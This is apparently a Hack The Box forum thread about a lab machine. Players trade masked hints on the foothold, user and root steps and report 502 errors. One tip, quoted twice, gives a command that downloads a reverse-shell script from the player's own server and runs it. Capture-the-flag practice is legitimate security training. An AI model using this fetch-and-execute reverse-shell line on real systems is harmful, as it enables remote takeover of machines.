Official Laboratory Discussion

Finally rooted this one. Definitely not an easy box considering the foothold.

Some hints.

Foothold:
Setup a local env so you know what to fetch. Then if you have the right article you should be able to get a shell

User Shell
After getting shell, see what you can change with current shell.

Root Shell
This shouldn’t be to hard. Your enum script should show something with extra capabilities. See what it does by looking inside it.

If you want any nudges, DM me.
Discord: thatjoe#1201

Connection timed out 90% of the time

Probably because htb is blocked in my country

I have a question, the version in G*** is “Community Edition”, why in the ■■■■ when we set up our environment is with Enterprise Edition !!!

Type your comment> @TazWake said:

Is there a solution for the 502 problem? Has anyone reported it to HTB?

it is a matter of waiting for a while. I read it in previous messages and it usually works.

@Darvidor said:

Type your comment> @TazWake said:

Is there a solution for the 502 problem? Has anyone reported it to HTB?

it is a matter of waiting for a while. I read it in previous messages and it usually works.

Thanks. I’d waited ~45 minutes before I reported it, then annoyingly about 2 minutes after the support people got involved it worked.

My issue with the box is even a few minutes wait will mean half the world will try to reset the box thinking it is broken, which keeps it permanently broken. If people raise tickets with HTB, hopefully, they will get the idea that there is a problem.

Other than that one issue, it is a really good box.

Hi, I need help for the initial foodhold. I found a way to read files from the host. Ok. I got one necessary file which contain a key required to get shell (difficult to explain without making spoiler).

I followed the instruction of that vulnerability. It works locally on my kali box but when I try to send something to the laboratory always is unsuccessful. It is really fustrating. If anyone can guide me I will appreciate it. Thanks. PM if you can or I can PM you. Thank you.

Type your comment> @aimforthehead said:

I believe I made some progress here -
I’ve replace the sXXXXX_XXy_XXXe that i got using the exploit with the one in my environment in my dXXXXX-cXXXXXX.yXX
Next, i got into gXXlXX environment shell in order to get the train console,
Once I’ve got their - the versions showing once the console in loaded is Different from the one i set prior to that in the first file I’ve mentioned.

Is that makes any sense ? it seems that the exploit is “working” and that example file
is creating once entering each line of the exploit lines.

If this is somewhat a spoiler please remove, hopefully not.
I’ve could use a guidance in next steps to getting RCE.

thanks

Because it is not that file (i think its a .j**n, check the docs), and you need to restart the service (to apply the key).

Type your comment> @waza said:

What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems

this approach got me good: wget “yourserver/rev.sh” && chmod +x rev.sh && ./rev.sh

trying the bash rev shell directly did not worked for me and the one i said above was reliable all the times (used it like 6 times due to resets and stuff)

Perfect!!! Thanks for the tip!> @waza said:

What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems

this approach got me good: wget “yourserver/rev.sh” && chmod +x rev.sh && ./rev.sh

trying the bash rev shell directly did not worked for me and the one i said above was reliable all the times (used it like 6 times due to resets and stuff)

Perfect!!! Thanks for the tip!!!

Just got the shell. This took me almost 2 days to make the reverse to work. Steps I followed:

1 - Get a Gb Dr environment working on your machine.
2 - Find a way to execute a R** that uses the secret found through SS**. There are 2 pages that I found that describes the process: ha****n slide and va** note on hae.
3 - Tip from @waza for wget (This was the tip that saved me lots of time)
4 - Find the correct reverse shell.

Rooted !

Hardest “easy” box I’ve done so far. The user part requires multiple steps and the exploitable service is unstable (as previously discussed) which make the box tiring.
The root part is very easy if you spot the right thing !

PM me if needed :slight_smile:

Rooted, but the user part is not easy. For me rate this box like easy it is a a mistake.
Of course interesting and funny but not easy.
PM me if you need some hint.

Genuinely feel empathetic for newcomers who’re trying to root this machine.

ok, so after a lot of trials and errors, i finally got shell.
currently working on user. it seems a bit tricky i guess since you’re inside
a con*****. i found some things that
the seed script gave me, which are not giving away things.

I did found the username, and the to**.txt but I’m struggling to alter the
user password using pos****.

Could use a nudge here.

@aimforthehead said:

ok, so after a lot of trials and errors, i finally got shell.
currently working on user. it seems a bit tricky i guess since you’re inside
a con*****. i found some things that
the seed script gave me, which are not giving away things.

I did found the username, and the to**.txt but I’m struggling to alter the
user password using pos****.

Could use a nudge here.

The platform has a way of bundling stuff up which can be useful. If you get it back, you can bring it back to life and find something really handy.

ok so got user. and I want to mention couple of things here -

  1. There is more then one way to get user.
  2. I’ve noticed an issue with the id_*** file. i was getting “bad format” when trying ssh with our friend de**** via ssh. what’s worked for me was
    https://forum.hackthebox.eu/discussion/3166/starting-point-markup-ssh-key-invalid-stuck-trying-to-get-user-txt/p1 (the 3rd post).

Moving onto root.

EDIT:
rooted, finally.
thanks both @waza and @HomeSen for their great insights and help.

@aimforthehead said:

ok so got user. and I want to mention couple of things here -

  1. There is more then one way to get user.
  2. I’ve noticed an issue with the id_*** file. i was getting “bad format” when trying ssh with our friend de**** via ssh. what’s worked for me was
    https://forum.hackthebox.eu/discussion/3166/starting-point-markup-ssh-key-invalid-stuck-trying-to-get-user-txt/p1 (the 3rd post).

Moving onto root.

Regarding the file: Just add a newline at the end, and you’re good to go. “Newer” versions of the tool seem to choke on it, when there’s no line-break at the end ^^

getting 502 error on G****** from last 1 hr

@pagal said:

getting 502 error on G****** from last 1 hr

Check if the machine has been restarted. The service (and all the other services it depends on) takes its time to start. Otherwise, try resetting the box, and wait ~5-10 minutes.

Hello All

Got a Register interface
but error with email domains :confused:

=> “Email domain is not authorized for sign-up”
?